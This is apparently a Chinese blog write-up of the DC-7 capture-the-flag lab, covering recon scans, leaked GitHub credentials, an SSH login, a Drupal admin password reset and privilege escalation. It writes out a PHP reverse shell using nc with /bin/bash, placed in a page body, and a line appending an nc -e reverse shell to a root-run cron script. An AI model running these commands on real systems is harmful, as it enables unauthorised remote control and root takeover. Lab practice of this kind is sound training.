简单系列靶场dc7

一、信息收集

1.确定目标IP

arp-scan -l

2.扫描开放端口

nmap -sV -A -p- 192.168.226.128

3.指纹识别

whatweb -v http://192.168.226.128

4.目录爆破

dirsearch -u http://192.168.226.128

二、漏洞查找

1.访问80端口

4.在主页面发现提示,为源码泄露

5.发现线索

6.测试在github搜索,发现源代码泄露用户名和密码

8.登录失败,尝试登录ssh

9.登录成功

ssh dc7user@192.168.226.128

三、反弹shell

1.发现一封邮件,前去查看

2.是一条来自root的邮件,同时发现一个新的路径

3.查看,是一条命令,用来修改admin密码的

5.发现可以修改密码,进行修改,注:要在网站根目录更改

drush user-password admin --password="123"

6.修改成功,登录

7.网站找了一圈,发现可以直接在content>>Add content>>Basic page下添加PHP反弹shell

8.需要下载PHP模块php模块地址:

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

9.启用模块

10.nc反弹

在body里写入php代码执行nc,如果连不上的话,就在php前面加一段<p>标签,里面随便写然后再连

<?php exec('nc IP 端口 /bin/bash')?>

11.反弹成功

nc -lvp

四、提权

1.当前用户是www-data,在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell

echo "nc -e /bin/bash 192.168.226.128 888" >> /opt/scripts/backups.sh

2.提权成功,发现在定时脚本里写如后建立监听连接的就是root,如果连不上,就多开几个监听

3.寻找flag

  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值